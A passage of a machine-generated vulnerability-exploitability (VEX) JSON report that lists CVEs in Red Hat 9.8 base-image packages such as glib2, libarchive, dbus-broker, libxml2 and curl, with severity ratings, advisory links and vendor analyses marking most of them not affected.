          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3985"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-15588.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15588"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15588"
        }
      ],
      "published": "2026-07-20T12:17:55+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2 GDBus) whose D-Bus IPC server is never opened by any product code."
      }
    },
    {
      "id": "CVE-2026-16118",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in xdgmime. A heap-based buffer overflow can be triggered in _xdg_mime_magic_parse_magic_line() in the xdgmimemagic.c file on little-endian systems when an attacker-controlled MIME magic file in a user-writable XDG data location (e.g., in the $XDG_DATA_HOME/mime/magic path) is parsed by an application performing MIME type detection (e.g., via g_content_type_guess()). When performing byte-swap, incorrect pointer arithmetic on the write side causes an out-of-bounds write of 2 bytes, resulting in an application crash or memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16118"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2501732"
        },
        {
          "url": "https://gitlab.freedesktop.org/xdg/xdgmime/-/work_items/41"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16118"
        }
      ],
      "published": "2026-07-17T20:17:16+00:00",
      "updated": "2026-07-29T17:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2/xdgmime) whose MIME-magic detection API is never invoked by any product code."
      }
    },
    {
      "id": "CVE-2026-16517",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A signed integer overflow vulnerability was found in libarchive's ZIP writer. In the archive_write_zip_header function in archive_write_set_format_zip.c, when ZIP encryption is enabled and the entry file size is close to INT64_MAX, the addition of the encryption overhead to the entry size overflows int64_t, resulting in undefined behavior. This could lead to incorrect Zip64 extension decisions or potential memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16517"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2505492"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16517"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16517"
        }
      ],
      "published": "2026-07-21T23:17:00+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-16730",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        755
      ],
      "description": "A flaw was found in dbus-broker. When the process file-descriptor limit is reached, EMFILE/ENFILE errors during peer setup (notably SO_PEERPIDFD) are handled as fatal failures, causing the broker to exit. A local attacker who can open many connections to the user session bus can trigger this and deny service to the desktop session. Flatpak applications can reach the host session bus through the dbus proxy.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16730"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16730"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2506348"
        },
        {
          "url": "https://github.com/bus1/dbus-broker/issues/435"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16730"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16730"
        }
      ],
      "published": "2026-07-24T12:16:47+00:00",
      "updated": "2026-08-14T08:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "28-7.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/dbus-broker@28-7.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757"
        }
      ],
      "published": "2026-02-02T13:15:58+00:00",
      "updated": "2026-06-17T10:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        305
      ],
      "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\nan Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criterion must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason being that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with  `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1965"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
        }
      ],
      "published": "2026-03-11T11:15:59+00:00",
      "updated": "2026-06-17T10:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
